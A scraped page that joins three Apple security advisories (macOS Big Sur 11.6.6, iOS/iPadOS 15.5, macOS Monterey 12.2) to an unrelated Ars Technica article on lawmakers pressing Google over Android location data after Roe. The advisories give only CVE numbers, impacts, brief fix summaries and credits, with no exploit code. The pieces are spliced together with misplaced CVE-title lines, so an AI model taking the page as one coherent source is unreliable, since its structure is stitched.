Available for: macOS Big Sur

Impact: A malicious application may be able to access restricted files

Description: This issue was addressed with improved entitlements.

CVE-2022-26728: Mickey Jin (@patch1t)

**TCC**

Available for: macOS Big Sur

Impact: An app may be able to capture a user's screen

Description: This issue was addressed with improved checks.

CVE-2022-26726: an anonymous researcher

**Tcl**

Available for: macOS Big Sur

Impact: A malicious application may be able to break out of its sandbox

Description: This issue was addressed with improved environment sanitization.

CVE-2022-26755: Arsenii Kostromin (0x3c3e)

**Vim**

Available for: macOS Big Sur

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating Vim.

CVE-2021-4136

CVE-2021-4166

CVE-2021-4173

CVE-2021-4187

CVE-2021-4192

CVE-2021-4193

CVE-2021-46059

CVE-2022-0128

**WebKit**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted mail message may lead to running arbitrary javascript

Description: A validation issue was addressed with improved input sanitization.

CVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu of Palo Alto Networks (paloaltonetworks.com)

**Wi-Fi**

Available for: macOS Big Sur

Impact: A malicious application may disclose restricted memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26745: an anonymous researcher

**Wi-Fi**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-26761: Wang Yu of Cyberserval

**zip**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted file may lead to a denial of service

Description: A denial of service issue was addressed with improved state handling.

CVE-2022-0530

**zlib**

Available for: macOS Big Sur

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-25032: Tavis Ormandy

**zsh**

Available for: macOS Big Sur

Impact: A remote attacker may be able to cause arbitrary code execution

Description: This issue was addressed by updating to zsh version 5.8.1.

CVE-2021-45444

CVE-2022-22675: About the security content of macOS Big Sur 11.6.6

This issue was addressed with improved checks. This issue is fixed in iOS 15.5 and iPadOS 15.5. Processing a large input may lead to a denial of service.

Released May 16, 2022

**AppleAVD**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26702: an anonymous researcher

**AppleGraphicsControl**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26736: an anonymous researcher

CVE-2022-26737: an anonymous researcher

CVE-2022-26738: an anonymous researcher

CVE-2022-26739: an anonymous researcher

CVE-2022-26740: an anonymous researcher

**DriverKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

**GPU Drivers**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26744: an anonymous researcher

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow issue was addressed with improved input validation.

CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative

**IOKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-26701: chenyuwang (@mzzzz\_\_) of Tencent Security Xuanwu Lab

**IOSurfaceAccelerator**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26771: an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs\_sg)

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26757: Ned Williamson of Google Project Zero

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication

Description: A race condition was addressed with improved state handling.

CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

**LaunchServices**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions on third-party applications.

CVE-2022-26706: Arsenii Kostromin (0x3c3e)

**libxml2**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-23308

**Notes**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a large input may lead to a denial of service

Description: This issue was addressed with improved checks.

CVE-2022-22673: Abhay Kailasia (@abhay\_kailasia) of Lakshmi Narain College Of Technology Bhopal

**Safari Private Browsing**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious website may be able to track users in Safari private browsing mode

Description: A logic issue was addressed with improved state management.

CVE-2022-26731: an anonymous researcher

**Security**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious app may be able to bypass signature validation

Description: A certificate parsing issue was addressed with improved checks.

CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

**Shortcuts**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to access photos from the lock screen

Description: An authorization issue was addressed with improved state management.

CVE-2022-26703: Salman Syed (@slmnsd551)

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab

WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

**WebRTC**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Video self-preview in a webRTC call may be interrupted if the user answers a phone call

Description: A logic issue in the handling of concurrent media was addressed with improved state handling.

WebKit Bugzilla: 237524  
CVE-2022-22677: an anonymous researcher

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may disclose restricted memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26745: an anonymous researcher

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to elevate privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26760: 08Tc3wBB of ZecOps Mobile EDR Team

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote attacker may be able to cause a denial of service

Description: This issue was addressed with improved checks.

CVE-2015-4142: Kostya Kortchinsky of Google Security Team

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-26762: Wang Yu of Cyberserval

CVE-2022-22673: About the security content of iOS 15.5 and iPadOS 15.5

An event handler validation issue in the XPC Services API was addressed by removing the service. This issue is fixed in macOS Monterey 12.2. An application may be able to delete files for which it does not have permission.

Released January 26, 2022

**AMD Kernel**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22586: an anonymous researcher

**ColorSync**

Available for: macOS Monterey

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22584: Mickey Jin (@patch1t) of Trend Micro

**Crash Reporter**

Available for: macOS Monterey

Impact: A malicious application may be able to gain root privileges

Description: A logic issue was addressed with improved validation.

CVE-2022-22578: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

Entry updated May 25, 2022

**iCloud**

Available for: macOS Monterey

Impact: An application may be able to access a user's files

Description: An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization.

CVE-2022-22585: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (https://xlab.tencent.com)

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-22591: Antonio Zekic (@antoniozekic) of Diverto

**IOMobileFrameBuffer**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-22587: an anonymous researcher, Meysam Firouzi (@R00tkitSMM) of MBition - Mercedes-Benz Innovation Lab, Siddharth Aeri (@b1n4r1b01)

**Kernel**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2022-22593: Peter Nguyễn Vũ Hoàng of STAR Labs

**Model I/O**

Available for: macOS Monterey

Impact: Processing a maliciously crafted STL file may lead to unexpected application termination or arbitrary code execution

Description: An information disclosure issue was addressed with improved state management.

CVE-2022-22579: Mickey Jin (@patch1t) of Trend Micro

**PackageKit**

Available for: macOS Monterey

Impact: An application may be able to delete files for which it does not have permission

Description: An event handler validation issue in the XPC Services API was addressed by removing the service. 

CVE-2022-22676: Mickey Jin (@patch1t) of Trend Micro

Entry added May 25, 2022

**PackageKit**

Available for: macOS Monterey

Impact: An application may be able to access restricted files

Description: A permissions issue was addressed with improved validation.

CVE-2022-22583: Ron Hass (@ronhass7) of Perception Point, Mickey Jin (@patch1t)

Entry updated May 25, 2022

**WebKit**

Available for: macOS Monterey

Impact: Processing a maliciously crafted mail message may lead to running arbitrary javascript

Description: A validation issue was addressed with improved input sanitization.

CVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu of Palo Alto Networks (paloaltonetworks.com)

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22590: Toan Pham from Team Orca of Sea Security (security.sea.com)

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: A logic issue was addressed with improved state management.

CVE-2022-22592: Prakash (@1lastBr3ath)

**WebKit Storage**

Available for: macOS Monterey

Impact: A website may be able to track sensitive user information

Description: A cross-origin issue in the IndexDB API was addressed with improved input validation.

CVE-2022-22594: Martin Bajanik of FingerprintJS

CVE-2022-22676: About the security content of macOS Monterey 12.2

Lawmakers argue Android phone data could be “weaponized against women” if the US Supreme Court officially overturns abortion protections.

More than 40 Democratic members of Congress called on Google to stop collecting and retaining customer location data that prosecutors could use to identify women who obtain abortions.

“We are concerned that, in a world in which abortion could be made illegal, Google’s current practice of collecting and retaining extensive records of cell phone location data will allow it to become a tool for far-right extremists looking to crack down on people seeking reproductive health care. That’s because Google stores historical location information about hundreds of millions of smartphone users, which it routinely shares with government agencies,” Democrats wrote May 24 in a letter led by Senator Ron Wyden (D-Ore.) and Rep. Anna Eshoo (D-Calif.). The letter was sent to Google CEO Sundar Pichai.

Specifically, Google should stop collecting “unnecessary customer location data” or “any non-aggregate location data about individual customers, whether in identifiable or anonymized form. Google cannot allow its online advertising-focused digital infrastructure to be weaponized against women,” lawmakers wrote. They also told Google that people who use iPhones “have greater privacy from government surveillance of their movements than the tens of millions of Americans using Android devices.”

The draft Supreme Court ruling overturning _Roe v. Wade_ could be followed by strict limits or bans on abortion in many states, and Democrats wrote that “Republicans in Congress are already discussing passing a law criminalizing abortion in all 50 states, putting the government in control of women’s bodies.”

Location Data From Android Phones

In their letter, Democrats told Pichai:

_While Google deserves credit for being one of the first companies in America to insist on a warrant before disclosing location data to law enforcement, that is not enough. If abortion is made illegal by the far-right Supreme Court and Republican lawmakers, it is inevitable that right-wing prosecutors will obtain legal warrants to hunt down, prosecute, and jail women for obtaining critical reproductive health care. The only way to protect your customers’ location data from such outrageous government surveillance is to not keep it in the first place._

Google obtains detailed information “from Android smartphones, which collect and transmit location information to Google, regardless of whether the phone is being used or which app a user has open,” they wrote. While Android users have to opt into this data collection, “Google has designed its Android operating system so that consumers can only enable third party apps to access location data if they also allow Google to receive their location data too. In contrast, Google is only able to collect location data from users of iPhones when they are using the Google Maps app,” the lawmakers wrote.

We contacted Google about the letter yesterday and will update this article if we get a response.

Exactly how Google’s location privacy settings work has been a matter of confusion, even for some Google employees. As we wrote in August 2020, documents from a consumer fraud suit the state of Arizona filed against Google “show that company employees knew and discussed among themselves that the company’s location privacy settings were confusing and potentially misleading.”

Democrats Say iPhone Users Have More Privacy

Because many of the cheaper smartphones use Android, the lawmakers warned of a “digital divide” affecting the privacy of people with low incomes:

_No law requires Google to collect and keep records of its customers’ every movement. Apple has shown that it is not necessary for smartphone companies to retain invasive tracking databases of their customers’ locations. Google’s intentional choice to do so is creating a new digital divide, in which privacy and security are made a luxury. Americans who can afford an iPhone have greater privacy from government surveillance of their movements than the tens of millions of Americans using Android devices._

While Google uses location data to target online ads, the company often turns over the data to law enforcement officials who obtain court orders, the Democrats wrote. “This includes dragnet ‘geofence’ orders demanding data about everyone who was near a particular location at a given time,” they wrote, adding that “Google received 11,554 geofence warrants in 2020.”

iPhones also use location services, though the lawmakers seem to be satisfied with Apple’s privacy promises. Among other things, Apple says that if location services are turned on, geo-tagged locations of nearby Wi-Fi hotspots and cell towers are sent “in an anonymous and encrypted form to Apple” to augment a “crowd-sourced database of Wi-Fi hotspot and cell tower locations.”

With the Find My feature that can locate lost devices, Apple says it “retains location information and makes it accessible to you for 24 hours, after which it is deleted” and that “device location services information is stored on each individual device and Apple cannot retrieve this information from any specific device.”

Post-_Roe_ State Abortion Laws

Assuming the Supreme Court overturns _Roe v. Wade_, there could be more state laws like the recently enacted Texas Heartbeat Act that bans abortions after it’s possible to detect a “fetal heartbeat.” The law defines that as “cardiac activity or the steady and repetitive rhythmic contraction of the fetal heart within the gestational sac.” This effectively bans abortions after six weeks, and the state law lets private citizens file lawsuits to obtain injunctions and damages of at least $10,000 per abortion.

These lawsuits could be filed against anyone who “performs or induces an abortion” that violates the Texas Heartbeat Act or anyone who “knowingly engages in conduct that aids or abets” an abortion after a fetal heartbeat is detected. Aiding or abetting includes “paying for or reimbursing the costs of an abortion through insurance or otherwise, if the abortion is performed or induced in violation of this subchapter.” Civil suits can also be filed against anyone who “intends to engage in the conduct” described in the law.

The Texas law doesn’t allow the exact scenario Democrats warned of in their letter, that prosecutors could jail women who obtain abortions. But states would have more leeway to enact stricter anti-abortion laws or bans after lifting _Roe v. Wade_.

The Guttmacher Institute, a pro-choice research group, says that “26 states are certain or likely to ban abortion without _Roe_.” Many of these states have laws that were enacted before the 1973 _Roe v. Wade_ decision and never removed, laws that were enacted after _Roe_ but currently blocked by court order, or “trigger” bans that would “take effect automatically or by quick state action if _Roe_ no longer applies.”

_This story originally appeared on_ _Ars Technica__._

Tag

#apple